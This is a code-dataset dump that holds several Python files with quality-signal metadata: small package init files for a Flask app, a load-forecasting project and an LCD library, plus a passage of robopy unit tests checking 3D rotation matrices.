hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ffdc73fd40b7e3f26a71711d0393b4951fcf7276 | 112 | py | Python | clover/index/__init__.py | JCL2017/clover | d074e5038c6a1a6b0333b14ff45bb35ac290f90f | [
"Apache-2.0"
] | 18 | 2019-07-01T04:49:33.000Z | 2022-03-11T03:15:09.000Z | clover/index/__init__.py | JCL2017/clover | d074e5038c6a1a6b0333b14ff45bb35ac290f90f | [
"Apache-2.0"
] | 64 | 2019-11-20T09:33:21.000Z | 2021-11-16T06:34:32.000Z | clover/index/__init__.py | JCL2017/clover | d074e5038c6a1a6b0333b14ff45bb35ac290f90f | [
"Apache-2.0"
] | 9 | 2019-10-18T08:28:26.000Z | 2020-05-25T15:38:12.000Z | #coding=utf-8
from flask import Blueprint
index = Blueprint('index', __name__)
from clover.index import views | 16 | 36 | 0.776786 | 16 | 112 | 5.1875 | 0.6875 | 0.337349 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010309 | 0.133929 | 112 | 7 | 37 | 16 | 0.845361 | 0.107143 | 0 | 0 | 0 | 0 | 0.05 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0.666667 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 6 |
ffeabd7cc6e451e0ab93b462fec92e7076be7bff | 34 | py | Python | electricityLoadForecasting/preprocessing/detection/__init__.py | BCD65/electricityLoadForecasting | 07a6ed060afaf7cc2906c0389b5c9e9b0fede193 | [
"MIT"
] | null | null | null | electricityLoadForecasting/preprocessing/detection/__init__.py | BCD65/electricityLoadForecasting | 07a6ed060afaf7cc2906c0389b5c9e9b0fede193 | [
"MIT"
] | null | null | null | electricityLoadForecasting/preprocessing/detection/__init__.py | BCD65/electricityLoadForecasting | 07a6ed060afaf7cc2906c0389b5c9e9b0fede193 | [
"MIT"
] | null | null | null |
from .detection_tools import *
| 6.8 | 30 | 0.735294 | 4 | 34 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.205882 | 34 | 4 | 31 | 8.5 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
083d5ef965afc77d6a863478c2098f0ade7b75f4 | 152 | py | Python | RPLCD/__init__.py | jknofe/pi_monitor | 1424017c8e25ced8fcd42b155d06ef5e14f70b75 | [
"MIT"
] | null | null | null | RPLCD/__init__.py | jknofe/pi_monitor | 1424017c8e25ced8fcd42b155d06ef5e14f70b75 | [
"MIT"
] | null | null | null | RPLCD/__init__.py | jknofe/pi_monitor | 1424017c8e25ced8fcd42b155d06ef5e14f70b75 | [
"MIT"
] | null | null | null | from .lcd import CharLCD
from .lcd import Alignment, CursorMode, ShiftMode
from .contextmanagers import cursor, cleared
from .lcd import BacklightMode
| 25.333333 | 49 | 0.822368 | 19 | 152 | 6.578947 | 0.578947 | 0.168 | 0.312 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.131579 | 152 | 5 | 50 | 30.4 | 0.94697 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f256c3a85409c1153917a0a440c5ea950f34376a | 58,695 | py | Python | robopy/tests/test_transforms.py | rodosha98/FRPGitHomework | 0905c79ccc28d33f9385c09c03e8e18d8c720787 | [
"MIT"
] | 214 | 2017-10-30T04:36:09.000Z | 2022-03-27T06:05:53.000Z | robopy/tests/test_transforms.py | rodosha98/FRPGitHomework | 0905c79ccc28d33f9385c09c03e8e18d8c720787 | [
"MIT"
] | 16 | 2017-11-28T08:07:04.000Z | 2020-05-12T22:15:10.000Z | robopy/tests/test_transforms.py | rodosha98/FRPGitHomework | 0905c79ccc28d33f9385c09c03e8e18d8c720787 | [
"MIT"
] | 57 | 2017-11-28T02:17:53.000Z | 2021-02-18T14:32:51.000Z | # Created by: Jack Button, Aditya Dua
# 10 June, 2017
import unittest
import numpy as np
from math import pi
from .test_common import matrices_equal, matrix_mismatch_string_builder
from ..base import transforms
# ---------------------------------------------------------------------------------------#
# 3D Transforms
# ---------------------------------------------------------------------------------------#
# angvec2r | ready
# angvec2tr | ready
# rotx | complete
class TestRotx(unittest.TestCase):
def test_transforms_3d_rotx_validData_returnDatatype(self):
self.assertIsInstance(transforms.rotx(0), np.matrix)
def test_transforms_3d_rotx_validData_returnData_dimension(self):
dimensions = transforms.rotx(0).shape
self.assertEqual(dimensions, (3, 3))
def test_transforms_3d_rotx_validData_boundaryCondition_0_rad(self):
expected_mat = np.matrix([[1, 0, 0], [0, 1, 0], [0, 0, 1]])
received_mat = transforms.rotx(0)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_rotx_validData_boundaryCondition_pi_by2_rad(self):
expected_mat = np.matrix([[1, 0, 0], [0, 0, -1], [0, 1, 0]])
received_mat = transforms.rotx(pi / 2)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_rotx_validData_boundaryCondition_pi_rad(self):
expected_mat = np.matrix([[1, 0, 0], [0, -1, 0], [0, 0, -1]])
received_mat = transforms.rotx(pi)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_rotx_validData_boundaryCondition_three_pi_by2_rad(self):
expected_mat = np.matrix([[1, 0, 0], [0, 0, 1], [0, -1, 0]])
received_mat = transforms.rotx(3 * pi / 2)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_rotx_validData_boundaryCondition_2pi_rad(self):
expected_mat = np.matrix([[1, 0, 0], [0, 1, 0], [0, 0, 1]])
received_mat = transforms.rotx(2 * pi)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_rotx_validData_boundaryCondition_0_deg(self):
expected_mat = np.matrix([[1, 0, 0], [0, 1, 0], [0, 0, 1]])
received_mat = transforms.rotx(0, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_rotx_validData_boundaryCondition_360_deg(self):
expected_mat = np.matrix([[1, 0, 0], [0, 1, 0], [0, 0, 1]])
received_mat = transforms.rotx(360, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_rotx_validData_boundaryCondition_90_deg(self):
expected_mat = np.matrix([[1, 0, 0], [0, 0, -1], [0, 1, 0]])
received_mat = transforms.rotx(90, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_rotx_validData_boundaryCondition_180_deg(self):
expected_mat = np.matrix([[1, 0, 0], [0, -1, 0], [0, 0, -1]])
received_mat = transforms.rotx(180, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_rotx_validData_boundaryCondition_270_deg(self):
expected_mat = np.matrix([[1, 0, 0], [0, 0, 1], [0, -1, 0]])
received_mat = transforms.rotx(270, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_rotx_validData_boundaryCondition_450_deg(self):
expected_mat = np.matrix([[1, 0, 0], [0, 0, -1], [0, 1, 0]])
received_mat = transforms.rotx(450, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_rotx_invalidData_arg1_string(self):
self.assertRaises(TypeError, transforms.rotx, 'invalid', unit='deg')
def test_transforms_3d_rotx_invalidData_arg2_string_mismatch(self):
self.assertRaises(AssertionError, transforms.rotx,
180, unit='invalid unit')
def test_transforms_3d_rotx_invalidData_arg2_bool(self):
self.assertRaises(AssertionError, transforms.rotx, 180, unit=True)
def test_transforms_3d_rotx_invalidData_arg2_int(self):
self.assertRaises(AssertionError, transforms.rotx, 180, unit=5)
# roty | complete
class Testroty(unittest.TestCase):
def test_transforms_3d_roty_validData_returnDatatype(self):
self.assertIsInstance(transforms.roty(0), np.matrix)
def test_transforms_3d_roty_validData_returnData_dimension(self):
dimensions = transforms.roty(0).shape
self.assertEqual(dimensions, (3, 3))
def test_transforms_3d_roty_validData_boundaryCondition_0_rad(self):
expected_mat = np.matrix([[1, 0, 0], [0, 1, 0], [0, 0, 1]])
received_mat = transforms.roty(0)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_roty_validData_boundaryCondition_pi_by2_rad(self):
expected_mat = np.matrix([[0., 0., 1.], [0, 1, 0.], [-1, 0., 0.]])
received_mat = transforms.roty(pi / 2)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_roty_validData_boundaryCondition_pi_rad(self):
expected_mat = np.matrix([[-1., 0., 0.], [0, 1, 0.], [-0, 0., -1.]])
received_mat = transforms.roty(pi)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_roty_validData_boundaryCondition_three_pi_by2_rad(self):
expected_mat = np.matrix([[-0., 0., -1.], [0, 1, 0.], [1, 0., -0.]])
received_mat = transforms.roty(3 * pi / 2)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_roty_validData_boundaryCondition_2pi_rad(self):
expected_mat = np.matrix([[1, 0, 0], [0, 1, 0], [0, 0, 1]])
received_mat = transforms.roty(2 * pi)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_roty_validData_boundaryCondition_0_deg(self):
expected_mat = np.matrix([[1, 0, 0], [0, 1, 0], [0, 0, 1]])
received_mat = transforms.roty(0, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_roty_validData_boundaryCondition_360_deg(self):
expected_mat = np.matrix([[1, 0, 0], [0, 1, 0], [0, 0, 1]])
received_mat = transforms.roty(360, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_roty_validData_boundaryCondition_90_deg(self):
expected_mat = np.matrix([[0., 0., 1.], [0, 1, 0.], [-1, 0., 0.]])
received_mat = transforms.roty(90, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_roty_validData_boundaryCondition_180_deg(self):
expected_mat = np.matrix([[-1., 0., 0.], [0., 1., 0.], [-0., 0., -1.]])
received_mat = transforms.roty(180, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_roty_validData_boundaryCondition_270_deg(self):
expected_mat = np.matrix([[-0., 0., -1.], [0, 1, 0.], [1, 0., -0.]])
received_mat = transforms.roty(270, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_roty_validData_boundaryCondition_450_deg(self):
expected_mat = np.matrix([[0., 0., 1.], [0, 1, 0.], [-1, 0., 0.]])
received_mat = transforms.roty(450, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_roty_invalidData_arg1_string(self):
self.assertRaises(TypeError, transforms.roty, 'invalid', unit='deg')
def test_transforms_3d_roty_invalidData_arg2_string_mismatch(self):
self.assertRaises(AssertionError, transforms.roty,
180, unit='invalid unit')
def test_transforms_3d_roty_invalidData_arg2_bool(self):
self.assertRaises(AssertionError, transforms.roty, 180, unit=True)
def test_transforms_3d_roty_invalidData_arg2_int(self):
self.assertRaises(AssertionError, transforms.roty, 180, unit=5)
# rotz | complete
class Testrotz(unittest.TestCase):
def test_transforms_3d_rotz_validData_returnDatatype(self):
self.assertIsInstance(transforms.rotz(0), np.matrix)
def test_transforms_3d_rotz_validData_returnData_dimension(self):
dimensions = transforms.rotz(0).shape
self.assertEqual(dimensions, (3, 3))
def test_transforms_3d_rotz_validData_boundaryCondition_0_rad(self):
expected_mat = np.matrix([[1, 0, 0], [0, 1, 0], [0, 0, 1]])
received_mat = transforms.rotz(0)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_rotz_validData_boundaryCondition_pi_by2_rad(self):
expected_mat = np.matrix([[0., -1., 0.], [1, 0, 0.], [0, 0., 1.]])
received_mat = transforms.rotz(pi / 2)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_rotz_validData_boundaryCondition_pi_rad(self):
expected_mat = np.matrix([[-1., -0., 0.], [0, -1, 0.], [0, 0., 1.]])
received_mat = transforms.rotz(pi)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_rotz_validData_boundaryCondition_three_pi_by2_rad(self):
expected_mat = np.matrix([[-0., 1., 0.], [-1, -0, 0.], [0, 0., 1.]])
received_mat = transforms.rotz(3 * pi / 2)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_rotz_validData_boundaryCondition_2pi_rad(self):
expected_mat = np.matrix([[1., 0., 0.], [-0, 1, 0.], [0, 0., 1.]])
received_mat = transforms.rotz(2 * pi)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_rotz_validData_boundaryCondition_0_deg(self):
expected_mat = np.matrix([[1, 0, 0], [0, 1, 0], [0, 0, 1]])
received_mat = transforms.rotz(0, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_rotz_validData_boundaryCondition_360_deg(self):
expected_mat = np.matrix([[1, 0, 0], [0, 1, 0], [0, 0, 1]])
received_mat = transforms.rotz(360, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_rotz_validData_boundaryCondition_90_deg(self):
expected_mat = np.matrix([[0., -1., 0.], [1, 0, 0.], [0, 0., 1.]])
received_mat = transforms.rotz(90, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_rotz_validData_boundaryCondition_180_deg(self):
expected_mat = np.matrix([[-1., -0., 0.], [0, -1, 0.], [0, 0., 1.]])
received_mat = transforms.rotz(180, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_rotz_validData_boundaryCondition_270_deg(self):
expected_mat = np.matrix([[-0., 1., 0.], [-1, -0, 0.], [0, 0., 1.]])
received_mat = transforms.rotz(270, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_rotz_validData_boundaryCondition_450_deg(self):
expected_mat = np.matrix([[0., -1., 0.], [1, 0, 0.], [0, 0., 1.]])
received_mat = transforms.rotz(450, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_rotz_invalidData_arg1_string(self):
self.assertRaises(TypeError, transforms.rotz, 'invalid', unit='deg')
def test_transforms_3d_rotz_invalidData_arg2_string_mismatch(self):
self.assertRaises(AssertionError, transforms.rotz,
180, unit='invalid unit')
def test_transforms_3d_rotz_invalidData_arg2_bool(self):
self.assertRaises(AssertionError, transforms.rotz, 180, unit=True)
def test_transforms_3d_rotz_invalidData_arg2_int(self):
self.assertRaises(AssertionError, transforms.rotz, 180, unit=5)
# trotx | complete
class Testtrotx(unittest.TestCase):
def test_transforms_3d_trotx_validData_returnDatatype(self):
self.assertIsInstance(transforms.trotx(0), np.matrix)
def test_transforms_3d_trotx_validData_returnData_dimension(self):
dimensions = transforms.trotx(0).shape
self.assertEqual(dimensions, (4, 4))
def test_transforms_3d_trotx_validData_boundaryCondition_0_rad(self):
expected_mat = np.matrix([[1., 0., 0., 0.], [0., 1., -0., 0.], [0., 0., 1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.trotx(0)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_trotx_validData_boundaryCondition_pi_by2_rad(self):
expected_mat = np.matrix([[1., 0., 0., 0.], [0., 0., -1., 0.], [0., 1., 0., 0.], [0., 0., 0., 1.]])
received_mat = transforms.trotx(pi / 2)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_trotx_validData_boundaryCondition_pi_rad(self):
expected_mat = np.matrix([[1., 0., 0., 0.], [0., -1., -0., 0.], [0., 0., -1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.trotx(pi)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_trotx_validData_boundaryCondition_three_pi_by2_rad(self):
expected_mat = np.matrix([[1., 0., 0., 0.], [0., -0., 1., 0.], [0., -1., -0., 0.], [0., 0., 0., 1.]])
received_mat = transforms.trotx(3 * pi / 2)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_trotx_validData_boundaryCondition_2pi_rad(self):
expected_mat = np.matrix([[1., 0., 0., 0.], [0., 1., 0., 0.], [0., -0., 1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.trotx(2 * pi)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_trotx_validData_boundaryCondition_0_deg(self):
expected_mat = np.matrix([[1., 0., 0., 0.], [0., 1., -0., 0.], [0., 0., 1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.trotx(0, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_trotx_validData_boundaryCondition_360_deg(self):
expected_mat = np.matrix([[1., 0., 0., 0.], [0., 1., 0., 0.], [0., -0., 1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.trotx(360, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_trotx_validData_boundaryCondition_90_deg(self):
expected_mat = np.matrix([[1., 0., 0., 0.], [0., 0., -1., 0.], [0., 1., 0., 0.], [0., 0., 0., 1.]])
received_mat = transforms.trotx(90, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_trotx_validData_boundaryCondition_180_deg(self):
expected_mat = np.matrix([[1., 0., 0., 0.], [0., -1., -0., 0.], [0., 0., -1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.trotx(180, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_trotx_validData_boundaryCondition_270_deg(self):
expected_mat = np.matrix([[1., 0., 0., 0.], [0., -0., 1., 0.], [0., -1., -0., 0.], [0., 0., 0., 1.]])
received_mat = transforms.trotx(270, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_trotx_validData_boundaryCondition_450_deg(self):
expected_mat = np.matrix([[1., 0., 0., 0.], [0., 0., -1., 0.], [0., 1., 0., 0.], [0., 0., 0., 1.]])
received_mat = transforms.trotx(450, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_trotx_invalidData_arg1_string(self):
self.assertRaises(TypeError, transforms.trotx, 'invalid', unit='deg')
def test_transforms_3d_trotx_invalidData_arg2_string_mismatch(self):
self.assertRaises(AssertionError, transforms.trotx,
180, unit='invalid unit')
def test_transforms_3d_trotx_invalidData_arg2_bool(self):
self.assertRaises(AssertionError, transforms.trotx, 180, unit=True)
def test_transforms_3d_trotx_invalidData_arg2_int(self):
self.assertRaises(AssertionError, transforms.trotx, 180, unit=5)
# troty | complete
class Testtroty(unittest.TestCase):
def test_transforms_3d_troty_validData_returnDatatype(self):
self.assertIsInstance(transforms.troty(0), np.matrix)
def test_transforms_3d_troty_validData_returnData_dimension(self):
dimensions = transforms.troty(0).shape
self.assertEqual(dimensions, (4, 4))
def test_transforms_3d_troty_validData_boundaryCondition_0_rad(self):
expected_mat = np.matrix([[1., 0., 0., 0.], [0., 1., 0., 0.], [-0., 0., 1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.troty(0)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_troty_validData_boundaryCondition_pi_by2_rad(self):
expected_mat = np.matrix([[0., 0., 1., 0.], [0., 1., 0., 0.], [-1., 0., 0., 0.], [0., 0., 0., 1.]])
received_mat = transforms.troty(pi / 2)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_troty_validData_boundaryCondition_pi_rad(self):
expected_mat = np.matrix([[-1., 0., 0., 0.], [0., 1., 0., 0.], [-0., 0., -1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.troty(pi)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_troty_validData_boundaryCondition_three_pi_by2_rad(self):
expected_mat = np.matrix([[-0., 0., -1., 0.], [0., 1., 0., 0.], [1., 0., -0., 0.], [0., 0., 0., 1.]])
received_mat = transforms.troty(3 * pi / 2)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_troty_validData_boundaryCondition_2pi_rad(self):
expected_mat = np.matrix([[1., 0., -0., 0.], [0., 1., 0., 0.], [0., 0., 1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.troty(2 * pi)
